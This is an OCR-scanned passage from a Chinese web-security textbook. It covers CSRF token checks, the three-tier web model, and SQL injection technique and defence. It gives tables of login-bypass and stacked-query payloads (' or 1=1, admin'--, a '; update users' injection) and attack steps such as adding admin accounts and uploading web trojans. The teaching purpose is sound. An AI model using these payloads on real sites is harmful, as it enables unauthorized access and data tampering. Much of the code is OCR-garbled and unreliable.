作 前 验证 这 个 令 牌 ,如 果 请 求 中 没有 令 牌 或 者 内 容 不 正确 , 则 认为 可 能 是 伪造 请 求 攻击 
而 拒绝 该 请 求 。 这 种 方法 也 可 以 完全 解决 请 求 伪造 的 问题 。 但 在 一 个 网 站 中 ,需要 防范 
的 地 方 非常 多 ,要 求 每 一 个 请 求 都 加 上 令 牌 会 增加 了 开发 人 员 的 工作 量 , 而 且 还 很 容易 
遗漏 。 

令 牌 该 如 何 产生 呢 ? 可 以 用 如 下 代码 产生 一 个 令 牌 ; 


$tokenvalue=md5 (uniqgid (rand() ,true)); 


这 里 用 rand() 函 数 产生 一 个 随机 整数 ,uniqid() 函 数 产 生 一 个 长 度 为 23 的 字符 串 ， 
md5() 函 数 将 这 个 字符 串 散 列 为 一 个 32 位 的 十 六 进 制 数 。 服 务 器 在 用 户 首 次 登录 时 产 
生 一 个 令 牌 ,并 将 其 放 人 用 户 会 话 的 session 之 中 ,在 每 次 请 求 时 ,就 把 令 牌 从 会 话 的 
session 中 取出 ,并 和 请 求 中 的 令 牌 进行 比较 。 

可 以 在 页 面前 加 入 代码 : 


< pp 

// 开 启 session 

Session start (); 

if(!isset ($_SESSION["tokenvalue "])) 

f 

// 生 成 唯一 的 字符 串 ,并 使 用 MD5 来 散 列 
$ tokenvalue=md5 (uniqid (rand () ,true)); 
// 创 建 session 变量 
$_SESSICN["tokenvalue "]= $tokenvalue; 


} 
// 检 查 是 否 相 等 
if (isset($_SESSION["tokenvalue "])) 
{ 
// 不 相等 
if($_SESSION["tokenvalue"] !=$_POST["tokenvalue "]) 
{ 
// 清 除 EST 变量 
unset ($_POST); 


> 


这 样 , 令 牌 便 以 参数 的 形式 加 入 到 了 请 求 之 中 。 但 是 ,在 一 个 站 点 中 有 很 多 地 方 可 
以 接受 form 请 求 , 给 每 一 个 请 求 者 加 一 个 令 牌 进行 验证 并 不 现实 ,一 般 的 做 法 是 在 每 次 
页 面 加 载 时 ,用 脚本 遍历 整个 DOM 树 ,在 所 有 的 二 a 之 和 到 form> 标 签 后 都 加 上 一 个 令 
牌 。 这 样 可 以 应 对 大 部 分 的 请 求 , 但 是 ,一 些 在 页 面 加 载 完成 之 后 动态 生成 的 HTML 代 
码 ,仍然 不 能 解决 添加 令 牌 验证 的 问题 ,还 是 要 开发 人 员 在 编写 相关 应 用 时 手动 添加 令 牌 。 

6) 在 HTTP 头 中 自 定 义 属 性 

为 了 解决 上 一 个 方法 设置 Token 比较 麻烦 的 问题 ,可 以 将 令 牌 放 到 HTTP 头 中 自 
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定义 的 属性 里 。 利 用 XMLHttpRequest 这 个 对 象 ,一 次 性 为 所 有 敏感 操作 在 请 求 头 增加 
一 个 新 的 属性 ,该 属性 的 值 则 是 一 个 令 牌 。 这 种 添加 令 牌 的 方式 比 上 一 种 方法 简单 。 而 
且 , 通 过 XMLHttpRequest 请 求 的 地 址 不 会 被 记录 到 浏览 器 的 访问 历史 ,不 用 担心 令 牌 
会 透 过 Referer 被 窃取 。 这 种 其 实 是 使 用 Ajax 方法 在 页 面 局 部 的 异步 刷新 的 操作 , 令 牌 
在 前 进 、 后 退 ,收藏 等 行为 中 将 失效 ,而且 如 果 是 遗留 系统 ,添加 Ajax 请 求 的 方法 等 同 重 
新 设计 整个 系统 ,代价 过 高 。 


323 SQ 注入 攻击 


由 于 各 种 Web 服务 器 的 漏洞 与 程序 的 非 严 密 性 ,导致 针对 Web 服务 器 的 脚本 攻击 
事件 日 益 增多 ,其 大 多 是 通过 ASP 或 PHP 等 脚本 注入 作为 主要 的 攻击 手段 ,如 今 Web 
站 点 发 展 得 又 十 分 迅速 ,基于 两 者 的 SQL 注入 也 慢 慢 地 成 为 攻击 的 主流 。 与 此 同时 ， 
Web 服务 器 端 程序 的 编写 过 程 中 普遍 存在 着 编写 者 专注 于 功能 的 实现 而 忽略 代码 安全 
性 检测 的 现象 ,导致 大 量 提供 交互 操作 Web 服务 器 存在 漏洞 ,其 中 至 少 70% 以 上 这 样 的 
站 点 存在 着 SQL 注入 的 缺陷 ,恶意 的 用 户 可 以 利用 服务 器 、 数 据 库 配置 的 疏漏 和 精心 构 
造 的 非法 语句 通过 程序 或 脚本 侵入 服务 器 获得 网 站 管理 员 的 权限 相关 数据 库 的 内 容 , 严 
重 的 还 可 以 获得 整个 服务 器 所 在 内 网 的 系统 信息 ,它们 的 存在 不 仅 对 数据 库 信息 造成 严 
重 威胁 ,甚至 还 可 以 威胁 到 系统 和 用 户 本 身 。 

要 理解 SQL 注入 ,就 要 首先 了 解 Web 三 层 架 构 及 数据 提交 的 信息 流 。 


1. Web 三 层 架构 


常见 的 简单 Web 应 用 如 图 3. 24 所 示 , 一 般 包含 三 层 , 即 表现 层 、 人 逻辑 层 及 数据 访 
问 层 。 

第 一 层 : 表现 层 , Web 应 用 的 最 高 层 , 类 似 于 图 形 用 户 界面 。 用 户 在 URL 栏 中 输入 
网 址 ,逻辑 层 接 收 访问 请 求 后 将 相应 的 HTML 页 面 发 送 给 表现 层 , 然 后 由 表现 层 呈现 给 
用 户 。 最 典型 的 就 是 网 上 购物 时 的 商品 浏览 购买 及 购物 车 等 相关 服务 ,能 够 通过 呈现 
出 的 HTML 页 面 知 道 商品 的 信息 。 

第 二 层 : 业务 逻辑 层 , 从 表现 层 分 离 出 的 单独 的 一 层 , 主 要 功能 是 接收 来 自用 户 的 表 
现 层 的 请 求 ,利用 逻辑 层 中 的 脚本 引擎 加 载 .编译 并 执行 脚本 语言 后 ,将 用 户 的 请 求 发 送 
给 存储 层 。 然 后 接收 来 自 于 存储 层 的 数据 反馈 ,以 HTML 网 页 的 形式 返回 给 用 户 。 

第 三 层 : 数据 访问 层 , 一 般 是 网 络 应 用 存储 数据 的 数据 库 服 务 器 ,对 数据 进行 检索 和 
存储 。 存 储 层 接收 来 自 于 逻辑 层 的 数据 查询 、 更 新 等 请 求 ,将 操作 的 结果 返回 给 逻辑 层 。 

在 三 层 模型 中 ,表现 层 不 与 数据 层 直接 通信 ,所 有 的 通信 都 需要 经 过 逻辑 层 处 理 ,这 
三 者 是 线性 关系 。 


2. Web 三 层 架构 下 数据 请 求 的 信息 流 


我 们 可 以 看 个 简单 的 例子 ,用 户 激 活 Web 浏览 器 并 连接 到 http://www. victim. 
com。 位 于 逻辑 层 的 Web 服务 器 从 文件 系统 中 加 载 脚本 并 将 其 传递 给 脚本 引擎 ,脚本 引 
擎 负责 解析 并 执行 脚本 。 脚 本 使 用 数据 库 连 接 器 打开 存储 层 连 接 并 对 数据 库 执 行 SQL 
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Windows 其 他 平台 
表现 层 客户 诺 “|| web 客户 端 || 的 客户 并 
(Presentation Layer) 
Web 服 务 
业务 组 件 
业务 逻辑 层 对 象 
(Business Logic Layer) 脚本 引擎 业务 逻辑 5 模型 
数据 访问 层 数据 接口 
(Data Access Layer) 
SQL 数 据 访问 层 || Oracle 数 据 访问 层 


数据 库 
(Database) SQL Server Access EO 


3.24 ”Web 三 层 架构 模型 


语句 。 数 据 库 将 数据 返回 给 数据 库 连 接 器 ,后 者 将 其 传递 给 逻辑 层 的 脚本 引擎 。 人 逻辑 层 
在 将 Web 页 面 以 HTML 格式 返回 给 表示 层 的 用 户 的 Web 浏览 器 之 前 , 先 执行 相关 的 
应 用 或 业务 逻辑 规则 。 用 户 的 Web 浏览 器 呈现 HTML 并 借助 代码 的 图 形 化 表示 展现 
给 用 户 。 所 有 操作 都 将 在 数秒 内 完成 ,并 且 对 用 户 是 透明 的 。 整 个 完整 的 信息 流 如 
图 3.25 所 示 。 


表示 层 逻辑 层 存储 层 
访问 http://www.victim.com [一 一 一》 加 载 、 编 译 并 执行 index.asp 
执行 SQL 
一 一 
RDBMS 
] ~ 
返回 数据 
呈现 HTML 《二 -= 一 发 送 HTML 
Web 浏 览 器 /呈现 引擎 编程 语言 : 数据 库 : 
C#、ASP、.NET、PHP、JSP 等 MSSQL 、MySQL 、Oracle 等 


3.25 ”Web 三 层 架构 下 数据 请 求 的 信息 流 


下 面 举 一 个 简单 的 例子 。 
以 执行 查询 “ 低 于 输入 价格 的 所 有 商品 ”的 PHP 语言 代码 为 例 : 


SconrF mysql_ connect ("localhost", "Usemame", "password"); 


#@: 网 络 安 全 模 切 面 


// 连 接 数据 库 
$query= "SETECT * FROM Products WHERE GoodsPrice < '$_GET['Val '] '"."ORDER BY ProductsDescription"; 


// 使 用 输入 动态 创建 SQL 语句 
$result=mysql query ($query); 
/查询 数据 
whlie ($rowrmysql fetdh array($result,MYSQL ASSOC)) 
{ 
Echo "Description: {$row['ProductsDescription'] Kbr> ". 
"Products ID:{$row['Products ID']}K br> ". 
"Peice: {$row['Price'] < br> <br> "; 


} 
// 返 回 记 录 集 ,将 结果 显示 在 浏览 器 


3, 引发 数据 库 语法 错误 


在 用 户 提交 的 参数 不 符合 逻辑 或 者 不 符合 SQL 查询 语句 语法 时 ,数据 库 会 产生 错 
误 。 虽然 SQL 注入 发 生 在 数据 访问 层 中 ,但 是 数据 库 会 将 错误 显示 在 Web 页 面 。 如 
图 3. 26 所 示 展 示 了 数据 库 抛 出 错误 时 的 信息 流 。 


SELECT* 
FROM PRODUCTS WHERE 
Www.abc.com/showproducts.asp?category='attacker category='attacker 
— 


用 户 。” ORA-01756 引号 内 的 “Web 服务 器 。 ORA-01756 引号 内 的 数据 库 
字符 串 没有 正确 结束 字符 串 没 有 正确 结束 服务 器 


3.26 ”数据 库 抛 出 错误 时 的 信息 流 


入 


用 户 在 提交 参数 category 二 attacker 时 ,在 参数 后 加 入 了 单 引号 ,使 得 查询 语句 变 为 
了 SELECT * FROM products WHERE category 王 attacker', 数 据 库 服务 器 在 执行 查询 
之 后 ,引发 了 quoted string not properly terminated 错误 ,并 将 错误 提交 给 Web 服务 器 ， 
再 由 Web 服务 器 将 错误 返回 给 浏览 器 。 引 发 数据 库 错误 的 目的 ,就 是 通过 错误 回 显 的 
信息 ,来 确定 数据 库 的 类 型 或 者 语法 。 


4. SQL 注入 的 种 类 


SQL 注入 基本 分 为 两 类 , 即 常 规 注入 和 盲 注入 。 

1) 常规 注入 

攻击 者 通过 构造 SQL 语法 ,引发 数据 库 查询 错误 ,再 利用 SQL 返回 的 错误 信息 , 进 
一 步 获 得 可 用 的 信息 。 常 用 的 方法 是 输入 数据 库 转 义 字 符 , 或 强制 数据 类 型 转换 等 , 迫 
使 数据 库 出 错 。 

2) 盲 注 入 
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盲 注入 是 一 种 猜测 型 注入 。 攻 击 者 向 数据 库 提交 一 些 真 假 问 句 , 根 据 数据 库 的 “ 作 
答 ”, 获 得 有 用 的 信息 ,并 进一步 修改 提交 语句 的 控制 范围 以 获取 更 多 的 信息 。 这 种 攻击 
常用 于 数据 库 屏蔽 回 显 错误 信息 之 后 ,攻击 者 看 不 到 返回 的 错误 内 容 时 。 攻 击 者 可 通过 
赋予 提交 参数 不 同 的 值 , 看 返回 页 面 的 变化 ,来 筛选 有 用 的 信息 。 正 因为 看 不 到 数据 库 
返回 的 信息 ,这 种 注入 才 叫 作 “ 盲 注入 ”。 


5.SQL 注入 流程 


SQL 注入 攻击 主要 是 通过 构建 特殊 的 输入 ,这 些 输入 往往 是 SQL 语法 的 一 些 组 合 。 
这 些 输入 将 作为 参数 传人 Web 应 用 程序 ,通过 执行 SQL 语句 而 执行 攻击 者 想 要 的 操作 。 
SQL 注入 攻击 对 于 不 同 的 关系 型 数据 库 略 有 差异 ,但 基本 原理 和 攻击 过 程 大 致 相同 ,无 
论 是 用 手工 进行 SQL 注入 攻击 ,还 是 用 自动 化 的 SQL 注入 攻击 工具 ,注入 攻击 的 一 般 流 
程 都 可 归纳 如 下 。 

1) 寻找 SQL 注入 点 

在 含有 传递 参数 的 动态 网 页 中 ,判断 是 否 存 在 SQL 注入 漏洞 。 经 典 查找 方法 是 在 
有 参数 传人 的 地 方 输入 参数 并 额外 添加 和 and 1 二 1、and 1=2 等 查询 条 件 , 通 过 浏览 器 
所 返回 的 具体 信息 来 判断 是 否 存 在 SQL 注入 漏洞 。 只 有 当 与 真 式 (and 1 王 1) 和 与 非 式 
(and 1 一 2) 都 返回 错误 时 , 才 表明 程序 对 输入 的 数据 进行 了 处 理 , 此 时 该 处 不 存在 注入 
点 ,但 大 多 数 情况 下 都 能 进行 注入 。 

2) 判断 数据 库 的 类 型 

通常 ,对 于 不 同 的 数据 库 管 理 系统 其 攻击 方式 也 不 同 。 对 于 不 同 的 数据 库 我 们 采取 
的 措施 也 有 一 定 的 不 同 。 

3) 确定 数据 库 模 式 

通过 探测 数据 库 表 名 和 列 名 ,并 探测 列 值 ( 字 段 值 ) 了 解数 据 库 的 相关 信息 。 该 攻击 
实施 的 动机 是 确定 数据 库 的 模式 ,主要 通过 逻辑 错误 查询 和 推断 的 攻击 方法 实现 。 在 得 
到 数据 库 的 相关 信息 (确定 数据 库 模 式 ) 之 后 ,下 面 就 可 以 扩张 权限 。 

4) 扩张 权限 

通过 步 台 2)、3) 确 定 了 数据 库 模 式 之 后 就 可 以 扩张 权限 。 

5) 实施 真正 的 攻击 

拥有 相应 的 权限 ,那么 就 可 以 实施 攻击 。 攻 击 包括 添加 管理 员 账 号 ,开放 远程 终端 
服务 .通过 后 台中 的 上 传 的 功能 来 上 传 网 页 木马 实施 对 服务 器 的 控制 等 。 


6. SQL 注入 寻找 动态 提交 参数 网 页 


任何 从 系统 或 者 用 户 处 接收 数据 参数 的 前 台 应 用 程序 都 有 可 能 出 现 SQL 注入 漏 
洞 ,这些 应 用 程序 又 会 被 用 于 访问 数据 库 服务 器 ,从 而 造成 数据 泄露 。 在 B/S 架构 中 ,用 
户 的 浏览 器 就 是 客户 端 ,接收 数据 后 向 服务 器 发 送 。 然 后 ,服务 器 利用 提交 的 数据 和 请 
求 创建 SQL 查询 。 在 寻找 SQL 注入 的 阶段 ,攻击 者 的 目标 就 是 引发 数据 查询 时 服务 器 
抛 出 的 异常 ,并 确定 其 是 否 由 SQL 注入 漏洞 产生 。 

SQL 注入 漏洞 的 识别 非常 简单 ,最 常用 的 方法 是 通过 输入 单 引号 引发 数据 异常 。 因 
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为 单 引号 是 分 隔 符 ,用 来 隔断 数据 与 代码 。 当 提交 单 引 号 时 ,字符 型 注入 会 引发 语法 错 
误 ,数字 注入 会 引发 表单 属性 错误 。 用 户 与 服务 器 在 通信 过 程 中 使 用 超 文本 传输 
(HTTP) 协 议 。HTTP 协议 包含 很 多 请 求 方法 ,其 中 只 有 两 种 和 SQL 注入 相关 , 即 GET 
和 POST。 

1) 使 用 GET 方法 注入 

GET 方法 以 显 式 提交 表单 ,可 以 在 地 址 栏 (URL) 看 见 传 递 的 参数 。 一 般 在 单 击 链 
接 的 时 候 , 会 用 到 此 种 方法 。 如 链接 http://image. haosou. comyi? ie 一 utf-8&src 一 hao _ 
360so&-q 二 get 方法 ,是 在 搜索 引擎 搜索 “GET 方法 ”时 获取 的 页 面 链接 ,在 此 链接 中 可 以 
直观 地 看 到 该 链接 包含 的 查询 参数 : ie、src 和 q。 只 要 对 链接 后 面 的 参数 进行 修改 并 提 
交 , 就 可 以 直接 操作 搜索 的 结果 。 因 此 ,对 于 以 GET 方法 进行 查询 的 页 面 ,在 URL 栏 中 
直接 改变 参数 值 , 并 加 上 附加 的 查询 语句 及 方法 ,就 可 以 进行 SQL 注入 攻击 。 

2) 使 用 POST 方法 注入 

POST 方法 在 注入 时 要 比 GET 方法 复杂 一 些 , 因 为 POST 方法 在 提交 参数 时 ,不 会 
对 用 户 显 示 参 数 相关 内 容 。 如 链接 http://www. w3. org/Protocols/rfc2616/rfc2616. 
Html, 用 户 单 击 后 只 会 打开 一 个 相关 页 面 , 然 后 向 页 面 的 提交 参数 的 窗口 输入 数据 ,该 请 
求 才 会 提交 。 与 GET 方法 提交 相 比 ,POST 提交 的 报 文 显 然 比 GET 提交 的 报 文 多 出 了 
POSTDATA 字段 ,这 个 字段 必须 在 截获 报 文 后 才能 看 见 , 且 内 容 会 被 加 密 , 要 使 用 专门 的 
POST 头 修改 工具 才 可 以 实施 注入 。 一 般 POST 方式 多 用 于 用 户 注 册 .用户 登录 等 页 面 。 

3) cookie 注入 攻击 

cookie 是 服务 器 为 了 识别 用 户 的 身份 ,在 用 户 计算 机 上 存储 的 一 段 txt 文本 。 当 用 
户 浏览 网 页 时 ,Web 服务 器 会 发 送 一 段 资料 放 在 用 户 的 计算 机 上 ,这 段 资料 会 把 用 户 浏 
览 的 页 面 及 用 于 身份 识别 的 信息 (用 户 名 、 密 码 ) 加 密 并 记录 下 来 。 当 用 户 再 浏览 同一 
网 站 时 ,Web 服务 器 会 根据 上 次 浏览 网 站 记录 的 cookie, 返 回 特定 的 页 面 给 用 户 。cookie 
能 由 客户 端 方 完全 控制 ,可 以 任意 处 理 内 容 , 攻 击 者 可 以 向 cookie 注入 查询 语句 ,达到 
SQL 注入 的 目的 。 

清楚 提交 参数 的 方法 ,可 以 令 攻 击 者 决定 进攻 网 站 的 方法 。 当 网 站 用 GET 方法 提 
交 参 数 时 ,SQL 语句 可 以 从 URL 栏 直 接 注入 ; 当 用 POST 方法 时 ,需要 使 用 工具 查看 并 
修改 HTTP 请 求 的 报 文 头 和 POST 参数 来 提交 ;如 果 电 脑 有 记录 cookie 的 信息 ,也 可 
以 尝试 从 cookie 进行 人 侵 。 


7. SQL 注入 提交 参数 识别 数据 库 信息 


引发 数据 库 出 错 ,是 为 了 查找 SQL 注入 的 注 和 点。 根据 SQL 的 出 错 信息 ,攻击 者 
不 但 能 够 判断 注入 点 处 注入 的 SQL 关键 字 是 否 参 与 了 数据 库 查 询 , 也 能 够 搜集 到 数据 
的 相关 信息 (字段 .语法 等 ) ,这 直接 关系 到 SQL 注入 是 否 能 够 成 功 实施 。 通 常 ,SQL 注 
入 是 在 用 户 提交 参数 的 地 方 进 行 ,如 用 户 登 录 窗 口 和 URL 栏 。 例 如 ,在 网 络 登 录 界 面 输 
入 用 户 名 和 密码 的 时 候 ,假如 登录 处 的 SQL 语句 为 : 


SELECT* FROM 表 名 WHERE usemame= ' 用 户 名 ' AND password "密码 ' 
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当 在 用 户 名 处 输入 单 引 号 , 且 密 码 处 不 提交 内 容 的 时 候 , 查 询 语 句 变 成 了 : 


SEIECT* FROM 表 名 WHERE Username= '…' RND password 


数据 库 会 抛 出 如 下 错误 : Error: You have an error in your SQL syntax; check the 
manual that corresponds to your MySQL server version for the right syntax to use near 
"at line 1。 

Web 服务 器 将 这 个 错误 抛 给 浏览 器 ,充分 表明 查询 代码 没有 对 引号 进行 过 滤 ,使 得 
单 引 号 作为 数据 参与 了 查询 ,而 数据 库 在 查询 中 使 用 单 引 号 作为 数据 的 分 隔 符 , 用 户 提 
交 单 引号 后 ,数据 库 无 法 区 分 单 引 号 是 用 户 提 交 的 数据 还 是 网 站 编写 时 参与 查询 的 代 
码 ,导致 本 次 查询 出 现 了 语法 错误 。 

引发 数据 库 错 误 的 原因 是 攻击 者 在 能 够 通过 回 显 的 SQL 错误 判定 暴露 数据 库 的 类 
型 ,甚至 有 时 能 暴露 SQL 的 语法 和 字段 ,便于 SQL 注入 。 但 是 引发 数据 库 出 错 并 不 是 
收集 数据 库 信息 的 唯一 途径 。 有 经 验 的 攻击 者 会 使 用 不 同 格式 的 命令 对 数据 库 展开 注 
入 ,这 往往 也 能 判断 数据 库 的 具体 信息 ,如 : 

1) len() 和 length() ,功能 是 返回 数据 长 度 

在 数据 库 类 型 是 MsSQL、MySQL 和 DB2 时 ,返回 长 度 值 是 调用 len() 函 数 ; 在 数据 
库 是 Oracle 和 Informix 时 , 则 是 通过 length() 来 返回 长 度 值 。 即 , 当 注 入 and len(a) 王 1 
的 时 候 , 如 果 页 面 正常 , 则 当前 的 数据 库 类 型 可 能 是 MsSQL、MySQL 或 DB2。 反 之 则 可 
能 会 是 Oracle 和 Informix。 

2) @@version 和 version() ,功能 是 返回 版 本 信息 

在 数据 库 类 型 是 MySQL 时 ,可 以 用 @@ version 或 是 version() 来 返回 当前 的 版 本 信 
息 。 但 是 对 于 MsSQL, 只 能 用 @@ version 函数 来 返回 版 本 信息 。 即 , 当 注 入 version() 二 1 
与 @@version>1, 返 回 页 面相 同 页 面 时 ,数据 库 可 能 是 MySQL。 如 果 页 面 出 现 提示 
version() 错 误 时 , 则 数据 库 可 能 是 MsSQL 。 

3) substring() 和 substr() ,功能 是 截取 一 个 栏 位 资料 中 的 一 部 分 

当 数 据 库 类 型 是 MsSQL 时 ,可 以 调用 substring()。Oracle 则 只 可 调用 substr()， 
当 调 用 substring 时 ,网 页 返回 错误 。 


8. SQL 注入 方法 


SQL 注入 的 初始 阶段 就 是 通过 输入 非法 参数 触发 SQL 报错 , 当 发 现 注 入 点 时 ,就 可 
以 通过 猜测 SQL 语法 ,来 注入 SQL 代码 。SQL 常用 注入 方法 就 是 内 联 SQL 注入 和 终 
止 型 注入 。 

1) 内 联 型 SQL 注入 的 原理 

内 联 型 SQL 注入 就 是 通过 猜测 SQL 注入 点 的 查询 语句 ,向 提交 的 参数 中 插入 SQL 
语句 片段 以 重 构 网 站 的 SQL 查询 语句 ,来 达到 绕 过 验证 或 者 提取 数据 的 目的 。 以 不 安 
全 登录 框 作为 例子 ,这 种 情况 下 ,往往 SQL 语句 比较 固定 : 


' 用 户 名 ' AND password= "密码 ' 
返回 表 中 特定 用 户 名 和 密码 的 记录 。 以 上 代码 中 , 表 名 、 用 户 名 、 密 码 均 不 重要 , 重 


SELIECT* FRM 表 名 WEERE 
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要 的 部 分 是 字段 名 和 数据 查询 的 结构 。 当 知道 字段 名 和 结构 的 时 候 ,我 们 就 能 够 绕 过 身 
份 认证 登录 网 站 后 台 。 

在 username 处 填写 admin'AND 1 二 1 OR'1'==1 ,会 使 SQL 语句 变 成 : 

SEIECT* FROM administrators WHERE Username= 'admin' RND I=1 CR '1'= "1' AND password= "" 


利用 AND 比 OR 优先 级 高 的 特点 ,注入 以 上 代码 可 以 使 得 查询 结果 永远 为 真 ,这 样 
就 可 以 使 数据 库 返 回 表 中 username 中 行为 admin 的 记录 ,并 忽略 了 密码 验证 ,顺利 登入 
后 台 。 

另外 ,内 联 型 注入 还 需 区 分 数字 型 和 字符 型 ,以 上 例子 是 字符 型 注入 ,因为 单 引 号 是 
分 隔 符 , 用 于 将 提交 的 字符 和 SQL 查询 语句 进行 区 分 , 引 在 单 引 号 中 的 字母 是 数据 ,之 
外 的 字母 是 SQL 语句 。 如 果 注 和 处 提交 的 是 数字 ,而 用 户 注 和 了 字母 , 则 数据 库 会 误 认 
为 用 户 提交 的 是 字段 名 ,使 查询 结果 改变 。 举 个 例子 ,假如 以 下 URL 存在 注入 点 
HTTP://www. xyz. com/Productshow. asp? Pid 二 55, 其 后 台 的 查询 语句 可 能 为 : 


SETECT * FROM Products WHERE Pid= 55 
意 为 查询 商品 列表 中 商品 编号 是 55 的 商品 。 如 果 将 55 注入 为 字母 ,如 goods, 则 注入 后 
的 查询 语句 为 : 
SETECT * FROM Products WHERE Pid= goods 
意思 变 成 了 查询 商品 列表 中 商品 编号 Pid 的 值 和 字段 名 goods 的 值 相 同 的 记录 。 
如 表 3. 2 所 示 列 举 了 内 联 注 入 常用 的 特征 值 。 
表 3.2 内 联 注入 常用 的 特征 值 


特 征 什 类 型 注入 后 结果 
' 字符 型 常规 注入 | 触发 错误 ,成功 后 会 引发 数据 库 错误 

lor d=1 字符 型 常规 注入 | 永 真 条 件 ,成 功 后 返回 表单 所 有 行 

String' or 二 | 字符 型 常规 注入 | 空 条 件 ,成 功 后 会 返回 与 原 值 相同 的 值 

land di 一 2 字符 型 常规 注入 | 永 假 条 件 ,成 功 后 不 返回 表 中 任何 行 

ey ee SO 抽 机 届 同 和 基 尖 攻 朵 


1'or ab 一 am 字符 型 连接 注入 | MySQL 连接 字符 串 ,成 功 后 返回 与 永 真 条 件 相同 信息 
1'or ab 一 alb | 字符 型 连接 注入 | Oracle 连接 字符 串 ,成 功 后 返回 与 永 真 条 件 相同 信息 


4 数字 型 运算 注入 | 成 功 后 将 注入 与 运算 结果 相同 的 值 

Value 十 0 数字 型 运算 注入 | 成 功 后 将 注入 与 原 值 相同 的 值 

lor1=1 数字 型 常规 注入 | 永 真 条 件 . 成 功 后 返回 表单 所 有 行 

Value or 1=2 数字 型 常规 注入 | 空 条 件 , 成 功 后 会 返回 与 原 值 相同 的 值 

1 and 1=2 数字 型 常规 注入 | 永 假 条 件 ,成 功 后 不 返回 表 中 任何 行 
2) 终止 型 注入 


一 般 在 注入 SQL 时 ,在 无 法 达成 验证 条 件 的 情况 下 ,利用 数据 库 的 “注释 符 ” 将 还 未 
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生效 的 验证 条 件 注释 掉 , 使 其 在 查询 时 不 执行 ,以 达到 注入 的 目的 。 
例如 ,在 此 段 代码 中 : 
SELECT* FROM 表 名 WHERE usermame= ' 用 户 名 ' AND password 密码 ' 
在 填写 用 户 名 处 注入 代码 admin or 1 三 1 一 , 则 代码 变 成 : 
SETPCT* FROM 表 名 WHERE username= ' admin' or ]=]1-- ' AND password= ' 密 码 ' 


“一 ”是 单行 注释 符 ,在 查询 语句 开始 执行 时 ,会 终止 后 面 的 密码 验证 ,达到 绕 过 验证 
的 目的 。 
如 表 3. 3 所 示 列 举 了 终止 型 注入 的 常用 特征 值 。 


表 3.3 终止 型 注入 的 常用 特征 值 


特 征 值 注入 后 结果 

admin™— 返回 表单 中 的 admin 行 集 , 绕 过 身份 验证 

admin'# MySQL 中 返回 表单 中 的 admin 行 集 , 绕 过 身份 验证 

1 一 注释 之 后 的 查询 ,清除 注入 参数 后 WHERE 子 句 的 限定 条 件 
1 or 1 一 1- 注入 数字 参数 ,返回 表单 所 有 行 

orl' 一 人- 注入 字符 串 参 数 , 返 回 表单 所 有 行 

1 and 1=2-- 注入 数字 参数 ,不 返回 表单 任何 行 

andd' 一 2 注入 字符 串 参 数 ,不 返回 表单 任何 行 

1/* 注 释 */ 注入 注释 ,对 原 请 求 无 影响 ,用 于 识别 SQL 注入 漏洞 


3) 多 语句 注入 

在 注入 SQL 查询 时 ,在 注入 内 容 中 添加 *;”( 分 号 ) 来 创建 多 条 SQL 语句 ,进一步 提 
高 对 数据 库 查询 的 控制 权 。 例 如 ,在 http://www. abc. com/wel. asp? uid 王 10 中 ,后 台 
数据 库 查询 语句 是 : 


SELECT * FROM Users WHERE UID= 10 and usemame= "YYY" 


在 URL 后 注入 :update users set username 二 XXX' where uid 二 10;-- 内 容 , 则 原 查 
询 语句 变 成 了 : 

SELECT * FROM Users WHERE UID= 10 UPDATA Users SET usemame= 'XXX" WHERE UID= 10 

原 语句 注入 后 ,识别 到 分 号 会 认为 是 上 一 语句 执行 完毕 ,会 将 新 加 入 的 语句 当 作 下 
一 条 SQL 语句 执行 ,使 得 攻击 者 将 users 表 中 UID 为 10 的 记录 的 用 户 名 由 YYY 改 为 
了 XXX。 

9. and 1 二 1 和 and 1 一 2 逻辑 判别 法 原理 


SQL 的 注入 和 判别 往往 是 同时 进行 的 。 在 判定 潜在 注入 点 是 否 可 以 SQL 注入 时 ， 
往往 可 以 使 用 附加 条 件 , 再 根据 数据 库 错 误 的 返回 信息 ,以 确定 此 处 是 否 可 以 进行 SQL 
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注入 。 最 经 典 的 方法 是 利用 逻辑 附加 条 件 and 1 二 1 和 and 1 一 2 来 分 别 进行 验证 ,如 果 
网 站 返回 两 个 不 同 的 页 面 ,确定 此 处 可 以 进行 SQL 注入 。 

注入 的 and 1=1 相当 于 对 结果 增加 了 一 个 附加 条 件 , 在 这 个 附加 条 件 下 , 若 原 条 件 
和 附加 条 件 都 为 真 ,页 面 会 显示 与 原 查询 结果 相同 的 页 面 。 接 着 ,再 附加 and 1 一 2, 这 个 
条 件 明显 是 个 假 条 件 , 如 果 原 条 件 为 真 ,附加 这 个 条 件 后 明显 结果 为 假 ,将 返回 与 原 页 面 
不 同 的 页 面 。 在 这 附加 条 件 下 ,两 个 页 面 不 同 ,基本 可 以 断定 此 处 可 以 进行 SQL 注入 。 
但 是 ,如 果 在 注入 and 1=1 时 数据 库 就 出 错 ,或 者 注入 真 假 两 个 条 件 两 个 返回 的 页 面相 
同 ,基本 断定 Web 对 用 户 提交 的 参数 做 了 限定 ,或 者 过 滤 了 参数 中 的 注入 关键 字 , 使 后 
台 查 询 不 能 提交 非法 参数 ,此 处 不 能 进行 SQL 注入 。 


10. SQL 注入 防护 


SQL 注入 的 预防 技术 总 体 分 为 两 个 大 类 , 即 代码 层 防 御 技术 和 应 用 层 防 御 技 术 。 在 
代码 层 防御 技术 中 ,最 常用 的 方法 就 是 使 用 参数 化 语句 、 加 入 输入 验证 和 使 用 存储 过 程 ， 
而 应 用 层 的 防护 ,多 采用 Web 应 用 防火 墙 。 

1) 代码 层 防 护 

SQL 代码 层 的 防护 是 网 站 编写 人 员 在 编写 代码 时 采用 的 防护 措施 ,一般 常用 的 有 三 
种 方法 ,即使 用 参数 化 SQL 语句 、 使 用 存储 过 程 和 加 入 数据 提交 限制 。 

(1) 参数 化 SQL 语句 。 

SQL 注入 的 根本 原因 ,是 将 SQL 命令 混在 用 户 提交 的 数据 中 交 给 数据 库 执 行 ,造成 
SQL 查询 时 数据 库 将 用 户 提交 的 SQL 语句 也 一 并 执行 。 其 本 质 就 是 动态 字符 串 构成 动 
态 SQL 查询 。 为 了 使 用 户 构造 的 数据 更 加 安全 ,大 部 分 网 站 编程 人 员 放 弃 了 直接 对 用 
户 提交 的 数据 进行 验证 的 传统 方法 , 改 为 使 用 占 位 符 或 变量 绑 定 的 方法 向 SQL 查询 提 
交 参 数 。 这 种 方法 可 以 在 大 部 分 情形 下 使 用 参数 化 语句 来 代替 现 有 的 动态 查询 。 

举 个 简单 的 例子 ,本 例 中 数据 库 类 型 为 oracle, 网 站 编程 语言 为 C# 。 

